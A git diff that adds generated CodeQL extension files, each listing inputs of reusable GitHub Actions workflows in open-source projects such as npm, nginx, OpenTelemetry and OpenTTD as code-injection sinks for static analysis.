a/actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml new file mode 100644 index 000000000000..ed86bf9266bb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml new file mode 100644 index 000000000000..79a253fe25e7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml new file mode 100644 index 000000000000..f78830a9f9a7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.dry_run", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml new file mode 100644 index 000000000000..789cdc003be6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml new file mode 100644 index 000000000000..a2d7f77b2531 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml new file mode 100644 index 000000000000..c3d0b1d87514 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml new file mode 100644 index 000000000000..35aeca022bc0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml new file mode 100644 index 000000000000..419d80970fab --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml new file mode 100644 index 000000000000..07841ba0a180 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml new file mode 100644 index 000000000000..2501e39f850a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml new file mode 100644 index 000000000000..2a1fd972192a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml new file mode 100644 index 000000000000..46568f16fa6a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml new file mode 100644 index 000000000000..0bba5671572e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml new file mode 100644 index 000000000000..37bd78f271d4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml new file mode 100644 index 000000000000..ebc6dfe01d21 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml new file mode 100644 index 000000000000..ab3c341b895e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml new file mode 100644 index 000000000000..78f8e605665f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml new file mode 100644 index 000000000000..d4d377730af0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml new file mode 100644 index 000000000000..d8cb45c66a74 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.chain", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml new file mode 100644 index 000000000000..2fc426809c24 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml new file mode 100644 index 000000000000..eee7b011b0c2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml new file mode 100644 index 000000000000..4dbaa756bc7d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml new file mode 100644 index 000000000000..f78ded292a5c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml new file mode 100644 index 000000000000..a0df95b6c756 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml new file mode 100644 index 000000000000..0538073273c8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml new file mode 100644 index 000000000000..d2d543b9cf80 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml new file mode 100644 index 000000000000..77c35145d4e4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml new file mode 100644 index 000000000000..68433b763418 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_folder", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml new file mode 100644 index 000000000000..c99b05845106 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml new file mode 100644 index 000000000000..bbdee0166f80 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml new file mode 100644 index 000000000000..caccb0883390 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "input.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "input.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "input.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "input.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml new file mode 100644 index 000000000000..f2172a5aaef8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml new file mode 100644 index 000000000000..59e33f0b6527 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "input.package_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml new file mode 100644 index 000000000000..ee54a015ebbb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml new file mode 100644 index 000000000000..5e750a24f30b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml new file mode 100644 index 000000000000..5622dd89b573 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml new file mode 100644 index 000000000000..bd4406f24542 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml new file mode 100644 index 000000000000..748e317edff3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file 